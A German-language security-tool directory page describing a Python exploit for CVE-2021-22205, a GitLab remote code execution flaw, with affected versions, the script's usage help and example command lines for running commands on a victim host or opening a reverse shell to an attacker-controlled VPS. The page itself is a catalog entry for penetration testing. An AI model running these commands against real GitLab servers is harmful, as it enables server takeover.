Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-22205 — Python-Exploit-Skript für CVE-2021-22205 (GitLab RCE) mit Befehlsausführung und Reverse-Shell-Funktionen. Unterstützt Ein-Klick-Getshell für Penetrationstests. | Kitploit
Tools/GitHubGitHub/keven1z/cve-2021-22205
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubkeven1z/cve-2021-22205

CVE-2021-22205

Python-Exploit-Skript für CVE-2021-22205 (GitLab RCE) mit Befehlsausführung und Reverse-Shell-Funktionen. Unterstützt Ein-Klick-Getshell für Penetrationstests.

Repository anzeigen
1232vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-22205

Aufgrund einer fehlerhaften Überprüfung der Bilddateien, die an den Dateiparser von GitLab übergeben werden, kann ein Befehl ausgeführt werden. Ein Angreifer kann eine bösartige Anfrage konstruieren, um beliebige Befehle auf dem Zielsystem auszuführen, was letztendlich zur Kontrolle des GitLab-Servers führt. Da es im Internet meist an Reverse-Shell-Funktionen mangelt, wurde das Skript aus dem Internet modifiziert und um eine One-Click-Getshell-Funktion erweitert.

Betroffene Versionen

  • 11.9 <= GitLab(CE/EE)< 13.8.8
  • 13.9 <= GitLab(CE/EE)< 13.9.6
  • 13.10 <= GitLab(CE/EE)< 13.10.3

Verwendung

	  ______     _______     ____   ___ ____  _      ____  ____  ____   ___  ____  
	 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \|___ \|___ \ / _ \| ___| 
	| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ 
	| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
 	\____ |  \_/  |_____|   |_____|\___/_____|_|    |_____|_____|_____|\___/|____/ 
    	
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
                         [-p PORT]

GitLab < 13.10.3 RCE

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标URL
  -c COMMAND, --command COMMAND
                        执行命令
  --shell               是否反弹shell
  -i IP, --ip IP        反弹shell ip
  -p PORT, --port PORT  反弹shell端口

Nutzung

python3 CVE-2021-22205.py -t [受害者ip] --shell -i [vps ip] -p [vps port] //反弹shell
python3 CVE-2021-22205.py -t [受害者ip] -c [command] //执行命令

Haftungsausschluss

Dieses Skript ist nur für Testzwecke bestimmt und darf nicht für andere Zwecke verwendet werden.

Tool herunterladen